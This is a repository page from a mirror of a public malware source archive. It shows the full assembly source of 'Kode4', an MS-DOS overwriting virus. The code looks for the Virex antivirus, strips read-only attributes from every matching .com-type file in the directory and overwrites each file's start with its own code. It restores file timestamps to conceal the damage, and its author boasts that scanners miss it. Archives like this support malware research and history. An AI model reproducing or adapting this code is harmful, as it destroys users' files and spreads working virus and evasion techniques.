Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
2be37d2649
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm
vxunderground a2f096eccc
Add files via upload
2021-01-12 17:47:04 -06:00

95 lines
3.4 KiB
NASM
Raw Blame History

;######################################################################
;# Name: Kode4 version 1.0 (overwritting stage)
;# Author: Soltan Griss [YAM]
;#
;# Description: What this sucker does is very simple. it overwrites
;# the first 46 bytes of all com files in the current
;# directory, with it's own code... as of scanv93, this
;# virus is undetectable..
;#
;#
;# Special Thanks go out to Data Disruptor.. If it were not for you i
;# would still be fucking lost!!!!
;#
;######################################################################
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
V_Length equ last-start
KODE4 proc far
start label near ;Check for Virex installiation
mov ax,0ff0fh
int 21h
cmp ax,0101h ;Abort if Virex Protection
je done ; present
mov ah,4Eh ;Find first Com file
mov dx,offset filename ;use "*.com"
int 21h
Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h
mov ax,3D01h ;Open file for writing
mov dx,9Eh ;get file name from file DTA
int 21h
mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h
push cx ;put in stack for later
push dx
mov dx,100h ;Start writing at 100h
mov cl,v_length ;write 46 bytes
mov ah,40h ;Write Data into the file
int 21h
pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh ;Close the file
int 21h
mov ah,4Fh ;Find Next file
int 21h
jnc Back
mov ah,9h
mov dx,offset DATA
int 21h
done: int 20h ;Terminate Program
filename db "*.c*",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
kode4 endp
LAST label near
seg_a ends
end start
View Git Blame Copy Permalink